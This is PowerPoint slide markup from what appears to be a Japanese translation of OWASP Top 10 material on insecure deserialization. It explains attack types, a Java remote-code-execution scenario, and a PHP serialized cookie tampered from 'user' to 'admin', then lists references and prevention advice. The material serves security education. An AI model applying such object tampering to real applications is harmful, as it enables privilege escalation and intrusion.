              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>種類の攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>オブジェクトとデータ構造に関連した攻撃：デシリアライズ中またはデシリアライズ後に、振る舞いを変更できるクラスがアプリケーションで使用可能な場合、攻撃者は、アプリケーションロジックの変更または、任意のリモートコード実行を行える攻撃である。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>典型的なデータ改ざん攻撃：既存のデータ構造が内容を変えられて使われるようなアクセス制御関連の攻撃である。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シリアライゼーションが、以下のような用途にアプリケーションで使用される場合：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>リモート間またはローカル内でのプロセス間通信（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ワイヤプロトコル、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>サービス、メッセージブローカー</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>キャッシュ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>永続化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>データベース、キャッシュサーバ、ファイルシステム</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>クッキー、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>フォームのパラメータ、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>認証トークン</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションが、一連の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spring Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>マイクロサービスを呼び出します。 関数型言語のプログラマーは、イミュータブルなコードを書こうとします。 そこで、プログラマーは、呼び出しの前後でシリアライズしたユーザーの状態を渡す、と言う解決策を思いつきます。 攻撃者は （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>でエンコードされていることを示す）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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r00"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>と言う</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>オブジェクトのシグネチャに気づき、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java Serial Killer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ツールを使用してアプリケーションサーバー上でリモートコードを実行します。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ある</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>フォーラムでは、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>オブジェクトのシリアライゼーションを使用して、ユーザのユーザ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ロール、パスワードハッシュやその他の状態を含む</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Super Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を保存します：</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a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者は、シリアライズされたオブジェクトを変更して攻撃者自身に管理者権限を与えます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="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a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>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1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>参考資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Cheat Sheet: Deserialization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Validate All Inputs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hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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CWE-502: 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Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> Security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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> Cali 2015: Marshalling Pickles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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安全なアーキテクチャを実現するには、シリアライズされたオブジェクトを信頼できないデータ供給元から受け入れないか、もしくはシリアライズ対象のデータをプリミティブなデータ型のみにします。上記の対策を取れない場合、以下の防止方法から一つ以上を検討してください</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
